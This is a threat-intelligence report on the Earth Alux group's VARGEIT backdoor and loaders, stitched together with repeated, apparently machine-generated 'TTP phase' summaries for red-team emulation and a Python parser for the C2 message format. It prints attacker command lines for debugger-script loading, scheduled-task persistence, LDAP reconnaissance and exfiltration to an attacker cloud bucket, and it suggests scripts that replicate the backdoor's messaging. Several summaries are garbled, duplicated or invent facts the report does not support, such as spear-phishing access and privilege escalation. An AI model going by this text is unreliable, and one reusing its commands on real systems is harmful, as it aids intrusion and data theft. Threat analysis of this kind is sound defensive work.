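The cdb rule deliberately matches on OriginalFileName, which comes from the binary's version resource and survives the rename to fontdrvhost.exe; an image-path rule would miss it. The mspaint rule will also fire on any legitimate launch with a non-path argument, so it is a hunting lead to review with parent process and network context rather than a blocking rule on its own.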

ChatGPT 4o paged extraction: TTP phases


Phase: Initial Access

  • Technique: Exploitation of Vulnerable Services
  • Procedure: The attackers exploit vulnerabilities in exposed servers to gain initial access.

Phase: Execution

  • Technique: Web Shell Execution
  • Tool: GODZILLA Web Shell
  • Procedure: Implantation of web shells like GODZILLA to facilitate backdoor delivery.

Phase: Execution (Backdoor Deployment)

  • Technique: Backdoor Deployment
  • Primary Tool: VARGEIT
  • Secondary Tool: COBEACON
  • Procedure: Deploy VARGEIT and COBEACON as first-stage backdoors.

Phase: Execution (First-Stage Loading)

  • Technique: Scripted Debugger Loading
  • Command: cdb.exe
  • Procedure: Use of a debugger script via cdb.exe to load VARGEIT in the first stage.

Phase: Execution (Later-Stage Loading)

  • Technique: DLL Sideloading
  • Procedure: Later stages of VARGEIT are executed using DLL sideloading via RAILLOAD, with persistence and timestomping handled by RAILSETTER.

Phase: Command and Control

  • Technique: Use of Backdoors for C2
  • Procedure: Maintain communication and control through VARGEIT and COBEACON backdoors.


Phase: Initial Access

  • Technique: Exploitation of Vulnerable Services
  • Procedure: Exploit vulnerabilities in exposed server services to gain access and implant web shells like GODZILLA for delivering first-stage backdoors.

Phase: Execution

  • Technique: Fileless Execution via MSPaint
  • Procedure: Use VARGEIT to load tools directly from the C&C server into spawned MSPaint processes for execution tasks.

Phase: Persistence

  • Technique: Timestomping
  • Tool: RAILSETTER
  • Procedure: Utilize RAILSETTER to modify timestamps of files for evading detection and ensuring persistence.

Phase: Defense Evasion

  • Technique: Guardrails
  • Tool: RAILLOAD
  • Procedure: Use RAILLOAD as a loader component with guardrails to restrict execution to specific environments or conditions.

Phase: Lateral Movement

  • Technique: Fileless Lateral Movement
  • Tool: VARGEIT
  • Procedure: Employ VARGEIT for fileless execution of supplemental tools to facilitate lateral movement across compromised network systems.

Phase: Network Discovery

  • Technique: Reconnaissance via MSPaint
  • Procedure: Utilize spawned MSPaint processes to perform network reconnaissance tasks stealthily.

Phase: Collection and Exfiltration

  • Technique: Data Collection and Exfiltration via MSPaint
  • Procedure: Leverage MSPaint processes to collect and exfiltrate data to the C&C server.


Phase: Execution

  • Technique: DLL Side-Loading with MASQLOADER
  • Procedure: The threat actor uses MASQLOADER as a DLL side-loaded loader to decrypt and execute COBEACON payloads. The encrypted payload is decrypted using a substitution cipher based on MASQLOADER's substitution table.

  • Technique: Shellcode Injection with RSBINJECT

  • Procedure: COBEACON is loaded as shellcode using RSBINJECT.

Phase: Persistence

  • The first-stage loaders described here (MASQLOADER, RSBINJECT) do not establish persistence themselves; the report attributes persistence to RAILSETTER, which creates a scheduled task for the side-loaded RAILLOAD and timestomps the files it installs.

Phase: Defense Evasion

  • Technique: Encrypted Payloads
  • Procedure: Use of encryption in the payload (substitution cipher) to evade detection and analysis.

  • Technique: DLL Side-Loading

  • Procedure: A legitimate, signed executable loads the attacker's DLL (MASQLOADER) from its own directory in place of the library it expects, so the malicious code runs under a trusted process name.


Phase: Defense Evasion

  • Technique: Anti-API Hooking
  • Procedure: Overwriting the code section of ntdll.dll in memory with the original code from the file to bypass API hooks used by security tools.

Phase: Execution

  • Tool: RSBINJECT
  • Procedure: Rust-based command line shellcode loader. It allows loading shellcodes directly without decryption, using optional flags and subcommands to test the shellcode.

Figure 6. RSBINJECT flags and subcommands

While RSBINJECT has been observed in attacks, its functionality suggests that it also doubles as a testing tool for shellcodes. Like MASQLOADER, this tool is likely not exclusive to Earth Alux.

First stage VARGEIT execution – CDB

First stage VARGEIT is executed via shellcode injection using a debugger script. This method uses cdb.exe (renamed as fontdrvhost.exe when dropped by the webshell) as the debugger and the host, running the script based on the LOLBAS method. The debugger script config.ini contains both a loader shellcode and the code for VARGEIT. This produces the following command line:

C:\programdata\fontdrvhost.exe -cf c:\programdata\config.ini -o c:\programdata\fontdrvhost.exe

This loading method is commonly used for the first-stage backdoor installation, delivered via the initial access methods (typically exploitation of externally exposed servers), and is often observed to install second and later-stage VARGEIT. A variation of this loading method uses a shellcode that loads an encrypted VARGEIT payload from a separate file component.

Second stage VARGEIT execution – DLL side-loading

Second stage VARGEIT is executed via DLL side-loading involving the RAILLOAD loader tool. This method is often used for second or later-stage installations and can have execution guardrails implemented via the said tool, as well as evasive measures via RAILSETTER.

RAILLOAD as second stage VARGEIT loader

RAILLOAD is a loader tool executed via DLL side-loading and is used for second-stage loading.

Phase: Initial Access

  • Technique: Exploitation of Public-Facing Application
  • Procedure: Threat actor exploits vulnerabilities in externally exposed servers to gain initial access.

Phase: Execution

  • Technique: Shellcode Injection via Debugger Script (CDB Method)
  • Command: C:\programdata\fontdrvhost.exe -cf c:\programdata\config.ini -o c:\programdata\fontdrvhost.exe
  • Details: Uses cdb.exe (renamed as fontdrvhost.exe) to execute debugger script config.ini containing loader shellcode and VARGEIT code. This is part of the LOLBAS method for executing first-stage backdoor installation.

Phase: Execution (Alternate Method)

  • Technique: Shellcode Loading of Encrypted Payload
  • Procedure: A shellcode variation loads an encrypted VARGEIT payload from a separate file component.

Phase: Execution (Second Stage)

  • Technique: DLL Side-Loading
  • Procedure: Second stage VARGEIT is executed through DLL side-loading using the RAILLOAD tool.

Phase: Evasion

  • Technique: Execution Guardrails and Evasive Measures
  • Tools: RAILLOAD and RAILSETTER
  • Details: RAILLOAD executes second-stage loading while RAILSETTER implements execution guardrails and evasive tactics.

Figure 7. RAILLOAD loading sequence

This tool comes with its own configuration and has been seen to load a variety of payload components from either an encrypted file or a registry location. The RAILLOAD configuration is base64-encoded and contains information separated by “||”:

File-based Configuration
||||
Registry-based Configuration
||||||

RAILLOAD decryption and execution guardrails

RAILLOAD’s decryption routine uses base64 decoding followed by AES-128 CBC mode decryption. Some variants add execution guardrails at this point. For example, if the config does not contain an AES key (it can be left blank), RAILLOAD uses information from the infected machine’s registry as the decryption key. In older variants, the first 16 bytes of HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid are used, while newer variants use the first 16 bytes of HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProductID instead.

Phase: Initial Payload Configuration

  • Technique: File or Registry-Based Configuration Loading
  • Procedure: RAILLOAD extracts configuration details from either an encrypted file or registry location. The configuration includes paths, AES keys, and filenames.

Phase: Decryption and Execution

  • Technique: Base64 Decoding and AES-128 CBC Mode Decryption
  • Procedure: RAILLOAD decodes the base64 encoded configuration and decrypts it using AES-128 CBC mode. Execution guardrails may be present, relying on specific host information as a decryption key if no AES key is provided.

  • Variant-Specific Decryption Key:

  • Older Variants: First 16 bytes of HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid
  • Newer Variants: First 16 bytes of HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProductID

Figure 8. RAILSETTER execution flow

RAILSETTER has been designed to be loaded via regsvr32.exe. RAILSETTER’s host is deployed in the same way as RAILLOAD’s host: a relocated and renamed copy of a file that already exists in the system. In later incidents involving Earth Alux, RAILSETTER no longer lands as a file but is instead executed via VARGEIT’s mspaint injection method.

Backdoor and Command & Control

The majority of Earth Alux’s activities for these stages are handled using VARGEIT’s features, one of which brings in miscellaneous tools. VARGEIT is a multi-channel configurable backdoor; the following channels, mostly used for communication, can be set in the configuration:

ID    Channel
0x00  HTTP
0x01  Reverse TCP
0x02  Reverse UDP
0x03  Bind TCP
0x04  Bind HTTP
0x05  Outlook
0x06  ICMP
0x07  DNS
0x08  Web
0x09  Bind SMB

Table 1. VARGEIT channels

The Outlook channel, which utilizes Graph API, is predominantly used in all observed attacks. Later variants also include versions where the Outlook channel is the only option.

Graph API enables authorized access to a user's Outlook mail data, allowing email-related operations such as reading, sending, and managing emails, as well as accessing calendar events and contacts from primary and shared mailboxes. VARGEIT’s configuration can also vary depending on the channel used. The Outlook channel type configuration contains the following information (Table 2):

Offset  Size  Value

Phase: Execution

  • Technique: DLL Side-Loading via regsvr32
  • Command: regsvr32.exe /s /n /i:<parameters> <path_to_RAILSETTER>

Phase: Execution (Alternative Method)

  • Technique: Process Injection
  • Procedure: RAILSETTER is injected into MSPaint via VARGEIT's mspaint injection method.

Phase: Command and Control

  • Technique: Multi-Channel Backdoor Configuration
  • Channels:

    • HTTP
    • Reverse TCP
    • Reverse UDP
    • Bind TCP
    • Bind HTTP
    • Outlook (Graph API)
    • ICMP
    • DNS
    • Web
    • Bind SMB
  • Details:

  • Primary usage of the Outlook channel, leveraging Graph API for email and calendar data access and manipulation.
  • Configuration varies based on the communication channel selected, focusing on Outlook for read/send email capabilities.

Additional Observations

  • Technique: Relocation and Renaming of Executable Files
  • Procedure: Executables are moved and renamed similarly to existing files for stealth.

RAILSETTER for persistence and timestomping

RAILSETTER is a persistence installer component designed to work with RAILLOAD. Its main functions include:

  • Copying and renaming RAILLOAD’s intended host from c:\windows\system32 to the intended target directory
  • Timestomping RAILLOAD’s and its host’s create, access, and modify times
  • Creating a scheduled task for persistence

RAILSETTER also has a base64-encoded configuration, which contains the information needed to perform its functions. The configuration is structured as follows:

||||||||
||||||||

The component’s execution flow is illustrated below:

Phase: Persistence

  • Technique: File Copy and Rename
  • Procedure: Copy RAILLOAD from c:\windows\system32 to a target directory specified in the configuration. The file is renamed as part of this process.

  • Technique: Timestomping

  • Procedure: Modify the create, access, and modify timestamps of both RAILLOAD and its host file to a specified date.

  • Technique: Scheduled Task Creation

  • Command: Example inferred command based on the description: schtasks /create /tn "<Scheduled task>" /tr "<host destination and new filename>" /sc once /st <Scheduled Task Trigger Time> /ru SYSTEM /f
  • Description: The task is created with a specific description and is set to trigger at the defined time.

  • Technique: Encoded Configuration Use

  • Procedure: Decode a base64-encoded configuration to retrieve instructions for execution, involving the target host, timestomping information, and scheduled task details.

This structured approach captures the key elements and sequences that can help a red team emulate this specific persistence mechanism used by RAILSETTER.

Offset  Size              Value
0x00    ~ (up to 0x1388)  Refresh token for MS Auth
0x1388  ~ (up to 0xC8)    URL for backup refresh token
0x1450  0x10              GUID used as registry data where the (auth) token is stored
0x1478  0x02              Unknown ID added to communication message + 0x2B
0x147a  0x04              Unknown DWORD value
0x147e  0x01              Channel byte; decides which communication channel will be used
0x147f  0x10              AES-128 key used for message decryption/encryption
0x148f  0x01              Flag to get external IP or not
0x1490  0x01              Unknown byte
0x1491  0x01              Exit byte
0x1492  0x04              Unknown DWORD value

Table 2. VARGEIT Outlook channel type configuration

In later versions of the backdoor, the URL for the backup refresh token and the GUID used as registry data for auth token storage have been removed from the configuration, shifting the offsets of the remaining information.

Using Graph API, the Outlook communication channel utilizes the draft folder for message exchanges between the backdoor and the controller. Backdoor messages are prepended with p_, while messages from the controller are prepended with r_. Messages processed by the backdoor are also deleted to remove tracks, and based on observation, the controller likely has the same functionality:

Phase: Command and Control (C2)

  • Technique: Hidden Communication Channel via Email Drafts
  • Procedure: The backdoor uses the Outlook draft folder for message exchanges. Messages sent from the backdoor are prefixed with p_, and those sent from the controller are prefixed with r_. Messages are deleted after processing to hide tracks.

Phase: Data Encoding

  • Technique: Encrypted Communication
  • Details: Communication messages are encrypted using an AES-128 key. The specific key offsets and encryption details are found in the backdoor's configuration.

Phase: Persistence

  • Technique: Registry Storage for Tokens
  • Procedure: A GUID is used as registry data to store authentication tokens, helping maintain persistent access.

Phase: Evasion

  • Technique: Token Refresh and Configuration Adjustments
  • Procedure: Tokens are refreshed, and certain configuration data like backup refresh token URLs and registry GUIDs are adjusted or removed in later versions to avoid detection and maintain operational security.

Figure 9. VARGEIT and controller interaction

Server message

The message from the C&C server is prepended with r_. A message ID allows the controller to keep track of the backdoor instance being controlled and enables the backdoor instance to identify which message it should read. The message ID is generated per backdoor instance using the fnv-1a x64 hash of a randomly generated GUID. The decimal equivalent of the fnv-1a x64 hash is used in the message title, while the hex equivalent is also embedded in the communication packet.

The server message body contains the actual communication data, which is encrypted using AES-128 CBC mode and compressed using zlib. It is then stored as a base64-encoded string within the message body.

Figure 10. Server message example

Figure 11. Decoded message from the C&C server

The base64-decoded layer has a header structure, and the actual encrypted data starts at offset 0x2a:

Offset  Size  Value
0x00    0x1e  (First unboxed sequence) Randomly generated padding bytes
0x1e    0x04  (Boxed in red) Size of the ByteArray
0x22    0x08  (Boxed in yellow) messageID in hex
0x2a    ~     (Boxed in black) Start of encrypted data

Table 3. Communication header structure

After decryption and decompression of the encrypted data, the message follows a specific structure:

I'm unable to extract direct procedures from the provided text as it primarily describes the communication structure between a threat actor's backdoor and its command and control (C&C) server. However, I can infer potential techniques related to this activity:

Phase: Command and Control

  • Technique: Encrypted Channel
  • Inference: The communication between the backdoor and the C&C server uses AES-128 CBC mode for encryption, ensuring data confidentiality.

  • Technique: Data Encoding and Compression

  • Inference: Before encryption, data is compressed using zlib and then base64 encoded for transmission.

  • Technique: Custom Protocol

  • Inference: A unique protocol is used involving message IDs generated via the fnv-1a x64 hash of a GUID, facilitating message tracking and identification.

Offset  Size  Data
0x00    0x1e  Randomly generated padding bytes
0x1e    0x04  Total size of the bytearray
0x22    0x01  Unknown communication flag. A message with empty content has a value of 0x00; a message in response to “collect message id” has a value of 0x01
0x23    0x08  messageID in hex
0x2b    0x08  ID from config+0x1478. The ID in the config is only a WORD, but when sending communication to the server, the space allocated for this ID is a QWORD
0x33    ~     Start of the encrypted data to be sent

Table 5. Decoded communication header structure

The encrypted data has a structure that varies based on what command the backdoor is responding to.

Figure 15. Decrypted data from the backdoor

The example in the image above is a response to the system info collection command, and it shows information such as the username, computer name, external IP address, internal IP address, OS version, user admin flag, host process name, and host process ID.

VARGEIT capabilities

VARGEIT’s backdoor capabilities are as follows:

Phase: Initial Access

  • Technique: Spear-Phishing Attachment
  • Procedure: The attacker sends a spear-phishing email containing a malicious attachment that delivers a backdoor.

Phase: Execution

  • Technique: Custom Backdoor Execution
  • Procedure: VARGEIT backdoor is executed post-exploitation to facilitate further actions.

Phase: Command and Control

  • Technique: Encrypted Data Communication
  • Procedure: The backdoor initiates communication with the C2 server using an encrypted data structure. This includes:
  • Random padding bytes
  • Message ID
  • Communication flag to denote message type

Phase: Information Collection

  • Technique: System Information Discovery
  • Procedure: The backdoor collects system information in response to specific C2 commands, returning details such as:
  • Username
  • Computer name
  • OS version
  • User admin status

Phase: Encrypted Data Construction

  • Technique: Custom Protocol Usage
  • Procedure: Constructs a custom protocol header including:
  • Total bytearray size
  • Message ID
  • Configuration ID modified (+0x1478)
  • Encrypted data beginning after the header

Each phase and technique is structured to simulate the realistic actions taken by a threat actor using the VARGEIT backdoor.
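The header layouts of Tables 3 and 5 and the fnv-1a x64 message ID, worked through as an added analyst helper (example code, not from the report and not VARGEIT's own code). It assumes little-endian integer fields, the GUID hashed as its ASCII text, and draft titles of the form p_/r_ followed by the decimal ID; none of these details are stated on the page, and the AES/zlib layer is left out.

```python
"""Analyst helper for VARGEIT-style Outlook-channel messages (added example, not code
from the report or from the backdoor). It parses the base64-decoded layer laid out in
Table 3 (server -> backdoor) and Table 5 (backdoor -> server) and derives the fnv-1a x64
message ID from an instance GUID so the decimal ID in a draft's title can be checked
against the hex ID embedded in the packet. Assumptions not stated on the page:
integer fields are little-endian, the GUID is hashed as its ASCII text, and the draft
title is '<p_|r_><decimal id>'. Decryption (AES-128 CBC + zlib) is out of scope here."""
import base64
import os
import re
import struct

FNV_OFFSET_64 = 0xCBF29CE484222325
FNV_PRIME_64 = 0x100000001B3
MASK_64 = 0xFFFFFFFFFFFFFFFF
PADDING_LEN = 0x1E              # random padding at offset 0x00 in both layouts
SERVER_HDR_LEN = 0x2A           # Table 3: encrypted data starts at 0x2a
BACKDOOR_HDR_LEN = 0x33         # Table 5: encrypted data starts at 0x33
TITLE_RE = re.compile(r"^(?P<prefix>[pr]_)(?P<dec>\d+)$")   # assumed title shape


def fnv1a_64(data: bytes) -> int:
    """Plain 64-bit FNV-1a."""
    h = FNV_OFFSET_64
    for b in data:
        h = ((h ^ b) * FNV_PRIME_64) & MASK_64
    return h


def message_id_for_guid(guid: str) -> int:
    """Per-instance message ID: fnv-1a x64 of the randomly generated GUID."""
    return fnv1a_64(guid.encode("ascii"))


def parse_server_layer(b64_body: str) -> dict:
    """Table 3: 0x1e padding | 0x04 size | 0x08 message ID | encrypted+zlib data from 0x2a."""
    raw = base64.b64decode(b64_body)
    if len(raw) < SERVER_HDR_LEN:
        raise ValueError("server layer shorter than its header")
    size = struct.unpack_from("<I", raw, 0x1E)[0]
    msg_id = struct.unpack_from("<Q", raw, 0x22)[0]
    return {"size": size, "message_id": msg_id, "ciphertext": raw[SERVER_HDR_LEN:]}


def parse_backdoor_layer(b64_body: str) -> dict:
    """Table 5: 0x1e padding | 0x04 size | 0x01 flag | 0x08 message ID | 0x08 config ID | data from 0x33."""
    raw = base64.b64decode(b64_body)
    if len(raw) < BACKDOOR_HDR_LEN:
        raise ValueError("backdoor layer shorter than its header")
    size = struct.unpack_from("<I", raw, 0x1E)[0]
    flag = raw[0x22]                                    # 0x00 empty, 0x01 reply to collect-id
    msg_id = struct.unpack_from("<Q", raw, 0x23)[0]
    config_id = struct.unpack_from("<Q", raw, 0x2B)[0]  # WORD in config, QWORD on the wire
    return {"size": size, "flag": flag, "message_id": msg_id,
            "config_id": config_id, "ciphertext": raw[BACKDOOR_HDR_LEN:]}


def title_matches_packet(title: str, packet_message_id: int) -> bool:
    """Consistency check for a suspicious draft: the decimal ID in the title must equal
    the ID carried in hex inside the decoded packet."""
    m = TITLE_RE.match(title)
    return bool(m) and int(m.group("dec")) == packet_message_id


def build_backdoor_test_vector(message_id: int, flag: int, config_id: int, payload: bytes) -> str:
    """Constructed test vector for parse_backdoor_layer (dummy payload, no real beacon data)."""
    body = bytearray(os.urandom(PADDING_LEN))
    body += struct.pack("<I", BACKDOOR_HDR_LEN + len(payload))
    body += bytes([flag]) + struct.pack("<Q", message_id) + struct.pack("<Q", config_id)
    body += payload
    return base64.b64encode(bytes(body)).decode()


def build_server_test_vector(message_id: int, payload: bytes) -> str:
    """Constructed test vector for parse_server_layer (dummy payload)."""
    body = bytearray(os.urandom(PADDING_LEN))
    body += struct.pack("<I", SERVER_HDR_LEN + len(payload)) + struct.pack("<Q", message_id)
    body += payload
    return base64.b64encode(bytes(body)).decode()


if __name__ == "__main__":
    # Constructed GUID; the real backdoor generates one at random per instance.
    mid = message_id_for_guid("3f2504e0-4f89-11d3-9a0c-0305e82c3301")
    sample = build_backdoor_test_vector(mid, 0x01, 0x2B2B, b"\x00" * 16)
    parsed = parse_backdoor_layer(sample)
    print(f"title p_{mid} matches packet: {title_matches_packet(f'p_{mid}', parsed['message_id'])}")
```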

Figure 12. Decrypted data from C&C

Offset  Size  Data
0x00    0x04  (First unboxed sequence) Size of the uncompressed message
0x04    0x04  (Boxed in red) Size of the remaining data passed as a parameter for the corresponding command’s function call
0x08    0x01  (Boxed in yellow) Command ID
0x09    0x08  (Boxed in black) Unknown
0x11    ~     (Boxed in white) Start of additional arguments (varies with command ID)

Table 4. Decrypted communication data structure

Figure 13. VARGEIT backdoor message example

Figure 14. Decoded message from the backdoor

It shares a similar structure with the server message, with some additional data in the message header block:

To provide relevant procedures for red team emulation from the context of the CTI report with the given structure and examples, here is the synthesized information:

Phase: Command and Control Communication

  • Technique: C2 Protocol with Custom Encoding
  • Procedure: The VARGEIT backdoor communicates by sending and receiving encoded and encrypted messages to and from the C2 server. Each message has a specific structure with fields for message size, command ID, and additional arguments.

Phase: Execution

  • Technique: Backdoor Command Execution
  • Procedure: Upon receiving a command ID as part of the decoded message, the backdoor executes specific functions based on the ID. This implies the use of function calls with parameters derived from the message structure.

Emulation and Monitoring

  • Procedure: Implement a listener that mimics the backdoor's messaging format to interact with command IDs. This includes constructing and parsing messages with headers indicating size and command identifiers. Adjust the listener to simulate or log executed functions based on recognized IDs.

For red team activities, consider developing scripts or utilities that replicate this message formation and parsing, allowing for dynamic command execution similar to the VARGEIT backdoor functionality.

  • Collect system information
  • Communicate using different channels
  • Interact with Windows Defender Firewall
  • Collect drive information
  • Collect running processes information
  • Get, set, search, create, and delete directories
  • Read and write to file
  • Execute command lines
  • Inject misc tools to a controlled mspaint or conhost instance

Attackers use the mspaint injection to directly execute additional tools from the C&C server on the target machine without any file landing on disk. VARGEIT opens an instance of mspaint into which a shellcode from the C&C server is injected. Code injection and execution use RtlCreateUserThread, VirtualAllocEx, and WriteProcessMemory. For command line tools, VARGEIT creates a pipe from which the output can be read and sent back to the controller. For injected tools that require interaction, the backdoor uses a named pipe.

Figure 16. Method 1: Executing the remote code

Phase: Reconnaissance

  • Technique: System Information Discovery
  • Procedure: Collect system and drive information, and gather running processes.

Phase: Execution

  • Technique: Command-Line Execution
  • Procedure: Execute various command lines to interact with the system.

Phase: Lateral Movement

  • Technique: Code Injection
  • Procedure: Inject tools into a controlled mspaint or conhost instance using RtlCreateUserThread, VirtualAllocEx, and WriteProcessMemory.

Phase: C2 Communication

  • Technique: Dual Channel Communication
  • Procedure: Use different channels for communication between the compromised system and the C&C server.

Phase: Impact

  • Technique: File System Manipulation
  • Procedure: Get, set, search, create, and delete directories; read and write to files.

Phase: Defense Evasion

  • Technique: Windows Defender Firewall Manipulation
  • Procedure: Interact with Windows Defender Firewall to potentially evade defenses.

Note: The tools and procedures involve injecting shellcode into mspaint for executing additional tools from the C&C server and using named pipes for communications with injected tools.

Figure 18. Method 3: Interacting with the injected process via named pipe

Discovery, collection, and exfiltration

It is also worth noting that VARGEIT can launch multiple instances of MSPaint to host tools. Various activities can be performed in the stages of the attack:

Installation

In more recent attacks, Earth Alux has changed the deployment method of RAILSETTER, one of its persistence installation tools. After previously being deployed as a DLL file to be loaded via regsvr32.exe, this tool is now executed via the mspaint method. Though there is no distinguishable argument in the mspaint process, the installation and timestomping behavior of RAILSETTER can be observed to come from it.

Discovery

Earth Alux deploys tools that appear to perform security event log and group policy discovery, as well as network/LDAP reconnaissance. An mspaint process performing security event log and group policy discovery can show the following command line arguments:

C:\Windows\System32\mspaint.exe Aslire597

An mspaint process performing network/LDAP reconnaissance can be seen with the following arguments:

C:\Windows\System32\mspaint.exe sElf98RqkF ldap

The network/LDAP reconnaissance process can also generate files containing network information. These are created inside a folder with the format \_\ (for example, c:\programdata\data\ad.domain.name_20241111062500). The following files can be created under this path:

  • adcs.txt
  • admin.keyword.users.txt
  • all.dc.host.txt
  • all.dns.record.txt
  • all.exchange.host.txt
  • all.gpo.txt
  • all.group.user.txt

Phase: Persistence

  • Technique: DLL Side-Loading via regsvr32
  • Procedure: Earth Alux deploys RAILSETTER as a DLL, loaded using regsvr32.exe, executed with the MSPaint method.

Phase: Execution

  • Technique: Process Injection
  • Procedure: VARGEIT launches multiple instances of MSPaint to host malicious tools.

Phase: Discovery

  • Technique: System and Network Discovery
  • Command for Security Event Log and Group Policy Discovery:
  • C:\Windows\System32\mspaint.exe Aslire597 <additional parameters>

  • Technique: Network/LDAP Reconnaissance

  • Command for Network/LDAP Reconnaissance:
  • C:\Windows\System32\mspaint.exe sElf98RqkF ldap <IP> <AD Domain> <machine AD domain>

  • Procedure: The Network/LDAP reconnaissance process generates files with network information inside a structured directory:

  • Example Path: <data path>\<ad domain name>_<date and time of collection>\
  • Example Files:
    • adcs.txt
    • admin.keyword.users.txt
    • all.dc.host.txt
    • all.dns.record.txt
    • all.exchange.host.txt
    • all.gpo.txt
    • all.group.user.txt

Figure 17. Method 2: Reading the output of the tool via an anonymous pipe

Figure 17 itself is not available here; the technique below is inferred from the description of reading tool outputs via an anonymous pipe, in the same structured format:

Phase: Execution

  • Technique: Output Capture via Anonymous Pipe
  • Procedure: The threat actor uses an anonymous pipe to capture the output of a command-line tool execution, allowing for silent data retrieval and analysis in memory without writing to disk.


  • all.host.txt
  • all.mssql.host.txt
  • all.old.host.txt
  • all.ou.txt
  • all.spn.txt
  • all.trusted.domain.txt
  • all.trusted.txt
  • all.user.workstations.host.txt
  • all.users.txt
  • as-rep_roasting.txt
  • delegation.host.txt
  • delegation.users.txt
  • disabled.users.txt
  • domain.admin.groups.txt
  • domain.adminsdholder.users.txt
  • locked.users.txt
  • neverexpire.users.txt
  • password_policy.txt
  • unconstrained_delegation.host.txt
  • unconstrained_delegation.users.txt

These files are then archived under the data path (c:\programdata\data in the example), with the filename ad.domain.name_20241111062500.zip.

Collection

Earth Alux loads a possible custom compression tool into mspaint for collection purposes. The process has the following arguments and output for a compressed file (with the file extension .tar.gz):

C:\Windows\System32\mspaint.exe

Among the collected files are ones produced during the discovery stage.

Exfiltration

Phase: Collection

  • Technique: Data Compression for Exfiltration
  • Procedure: Earth Alux uses a custom compression tool by loading it into mspaint.exe for data collection purposes.
  • Command: C:\Windows\System32\mspaint.exe <target directory for compression> <path and filename of compressed file> <unknown argument>

Phase: Exfiltration

  • Technique: Compressed File Exfiltration
  • Procedure: Collected files, including those generated during the discovery stage, are archived with a custom filename format (e.g., ad.domain.name_20241111062500.zip) before exfiltration.

Earth Alux also deploys an exfiltration tool via this method to exfiltrate the compressed file created during the collection stage. Here, it displays the following arguments:

C:\Windows\System32\mspaint.exe gWgGfsq1PcUUoo dm9TTlEwM0NXRkF3TXRkM3RVSHg3SGQ3TDl4YVNRNGY=

It is interesting to note that the exfiltrated data is sent to an attacker-controlled cloud storage bucket. Based on our telemetry, Earth Alux has used the same cloud storage bucket to exfiltrate from different targets.

Testing and development

Earth Alux conducts several tests with RAILLOAD and RAILSETTER. These include detection tests and attempts to find new hosts for DLL side-loading. DLL side-loading tests involve ZeroEye, an open source tool popular within the Chinese-speaking community, for scanning EXE files’ import tables for imported DLLs that can be abused for side-loading.

Figure 19. Command line version options

Figure 20. Scan result

Phase: Exfiltration

  • Technique: Exfiltration Over Alternative Protocol
  • Command: C:\Windows\System32\mspaint.exe gWgGfsq1PcUUoo <region> <bucket name> <ID> <secret> <expire time> dm9TTlEwM0NXRkF3TXRkM3RVSHg3SGQ3TDl4YVNRNGY= <path of data for exfiltration>

Phase: Defense Evasion

  • Technique: DLL Side-Loading
  • Tool: ZeroEye
  • Procedure: Earth Alux uses ZeroEye to scan executable files' import tables for DLLs that can be exploited for side-loading.

Phase: Testing and Development

  • Technique: Detection Bypass Testing
  • Tools: RAILLOAD and RAILSETTER
  • Procedure: Conducts detection tests and searches for new hosts to exploit DLL side-loading techniques.

software and modify the pinpointed codes to bypass file-based detections.

Target industries

Earth Alux has predominantly targeted a diverse array of sectors, namely government, technology, logistics, manufacturing, telecommunications, IT services, and retail, reflecting its strategic focus on high-value and sensitive information across different industries. The group's activities have primarily been observed in the APAC region, specifically affecting countries such as Thailand, the Philippines, Malaysia, and Taiwan. In mid-2024, Earth Alux extended its operations to Latin America, with notable incidents reported in Brazil.

Conclusion and security recommendations

Earth Alux represents a sophisticated and evolving cyberespionage threat, leveraging a diverse toolkit and advanced techniques to infiltrate and compromise a range of sectors, particularly in the APAC region and Latin America. Its reliance on the VARGEIT backdoor, along with the use of COBEACON and various loading methods, highlights a strategic approach to maintaining stealth and persistence within target environments. The group's ongoing testing and development of its tools further indicate a commitment to refining its capabilities and evading detection. Understanding the operational methods associated with Earth Alux is crucial for developing effective defenses and mitigating the risks posed by such advanced cyber threats.

To bolster protection against APT attacks, organizations can adopt a proactive security mindset by implementing security best practices such as the following:

  • Periodically patch and update systems used, as attackers can take advantage of vulnerabilities to gain initial access.
  • Perform vigilant monitoring to observe any unusual activity such as uncommonly heavy network activity, reduced performance and speed, and so on.
  • Leverage solutions that help organizations take a proactive security stance and manage security holistically with comprehensive prevention, detection, and response capabilities.

As organizations continue to face the challenges posed by Earth Alux, it is imperative to enhance their cybersecurity measures, adopt proactive threat detection strategies, and remain vigilant against the evolving tactics of this persistent adversary.

Proactive security with Trend Vision One™

Trend Vision One™ is the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure management, security operations, and robust layered protection. This comprehensive approach helps you predict and prevent threats, accelerating proactive security

Phase: Initial Access

  • Technique: Phishing via Malicious Document
  • Procedure: The attacker sends spear-phishing emails with malicious attachments, leveraging vulnerabilities or crafting macros to execute payloads.

Phase: Execution

  • Technique: Custom Backdoor Deployment
  • Tools Used: VARGEIT backdoor
  • Procedure: The backdoor is deployed and used to execute commands and scripts remotely.

Phase: Persistence

  • Technique: Script-Based Persistence
  • Procedure: Using scheduled tasks or services manipulated by scripts to maintain access across reboots.

Phase: Privilege Escalation

  • Technique: Vulnerability Exploitation
  • Procedure: Exploiting known vulnerabilities in software to elevate privileges on compromised systems.

Phase: Lateral Movement

  • Technique: Remote Execution via COBEACON
  • Tools Used: COBEACON
  • Procedure: The tool is used to move laterally within the network, executing commands on different systems.

Phase: Defense Evasion

  • Technique: Code Modification and Obfuscation
  • Procedure: Modifying malware code to bypass file-based detection mechanisms and prevent being flagged by security software.

Phase: Command and Control (C2)

  • Technique: Encrypted Traffic and Obfuscation
  • Procedure: Using encrypted channels to communicate with C2 servers to maintain contact with compromised systems.

Figure 21. Qualified candidate output

Earth Alux pairs ZeroEye with CloneExportTable, a tool used to clone the export table of a specified DLL into the export table of the DLL that is used for side-loading. Use of this tool usually involves cloning the desired DLL’s export table into RAILLOAD samples.

Figure 22. CloneExportTable command

Figure 23. Example of resulting export table

Earth Alux also used VirTest, another testing tool popular among the Chinese-speaking community, for detection testing purposes and to enhance their toolsets’ evasive features.

Figure 24. VirTest tool

VirTest allows users to pinpoint codes in their tools that cause file-based detections from security

Phase: Defense Evasion

  • Technique: DLL Side-Loading
  • Tool: CloneExportTable
  • Procedure: The attacker uses CloneExportTable to clone the export table of a specified DLL into the export table of a DLL intended for side-loading, such as RAILLOAD samples.

Phase: Defense Evasion

  • Technique: Detection Testing and Evasion
  • Tool: VirTest
